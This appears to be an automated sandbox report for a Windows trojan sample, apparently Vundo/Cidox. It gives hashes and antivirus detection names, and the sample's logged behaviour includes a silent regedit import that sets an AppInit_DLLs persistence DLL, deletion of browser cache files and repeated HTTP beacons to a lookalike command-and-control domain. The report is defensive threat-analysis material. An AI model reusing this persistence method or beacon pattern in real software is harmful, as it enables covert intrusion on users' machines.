Analysis Date: 2015-01-16 14:53:17
MD5: 6b0f8f8fd31ed93d014a1cddc4c12508
SHA1: c56d2b79547993eda2f078ce40a74c9d6f00f7b5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 39ca738295cda88fc3b233f44b152ed6 sha1: dcd50dcadd83426b2e0852326db32024851deedc size: 27136
Section CODE md5: d53336ee81ccd2781d60add0b62c51d8 sha1: 6f2dfbd532b3ace3f8cff2f0e4b4800a4e5c6a2c size: 2048
Section .rdata md5: b200b9db1b3934cba342556264a9ecac sha1: f8046252d55de540586c9249c57b423bedda5871 size: 7680
Section .data md5: e856b13c77c01dadbd1fe8339d2fc82e sha1: 05938f1099c688126c2cda3899e937f719ad442a size: 3584
Section .rsrc md5: f68c62420509c4049a3681bb4f4f1f43 sha1: 5482ce6c4be68f8c0db7e33644979924d473d757 size: 155648
Timestamp: 2013-01-29 13:30:01
Packer: Microsoft Visual C++ ?.?
PEhash: 4a981d283e0fec8994cd34c11532c9e2567014b3
IMPhash: 152e2db9b04356fc6c48553e7fc552e1
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Generic.KDZ.5634
AV Alwil (avast): no_virus
AV Arcabit (arcavir): Trojan.Generic.KDZ.5634
AV Authentium: W32/Backdoor.PPTG-6933
AV Avira (antivir): TR/Dldr.Vundo.jpoiu
AV BullGuard: Trojan.Generic.KDZ.5634
AV CA (E-Trust Ino): Win32/Vundo.IIL
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.Mayachok.18397
AV Emsisoft: Trojan.Generic.KDZ.5634
AV Eset (nod32): Win32/Citirevo.AE
AV Fortinet: W32/Cidox.AUBN!tr
AV Frisk (f-prot): W32/Backdoor2.HQZV
AV F-Secure: Trojan.Generic.KDZ.5634
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cidox
AV K7: Backdoor ( 04c513e51 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent.CH
AV Mcafee: Vundo-FBDM!6B0F8F8FD31E
AV Microsoft Security Essentials: Trojan:Win32/Vundo
AV MicroWorld (escan): Trojan.Generic.KDZ.5634
AV Rising: no_virus
AV Sophos: Troj/Vundo-BE
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.Trojan-Dropper.Injector

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\mfvrtem.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\mfvrtem.dll\\x00

Network Details:

HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYMck4weTn5Px
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYL3l+jNCUZgx
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOscjgrZdOl0
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmGy11cMSpu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmGy11cMSpu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmxwAWH/XzT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmxwAWH/XzT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYFv1T+Cx22P6
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYFu/B0w5v/GB
User-Agent:

Raw Pcap

Strings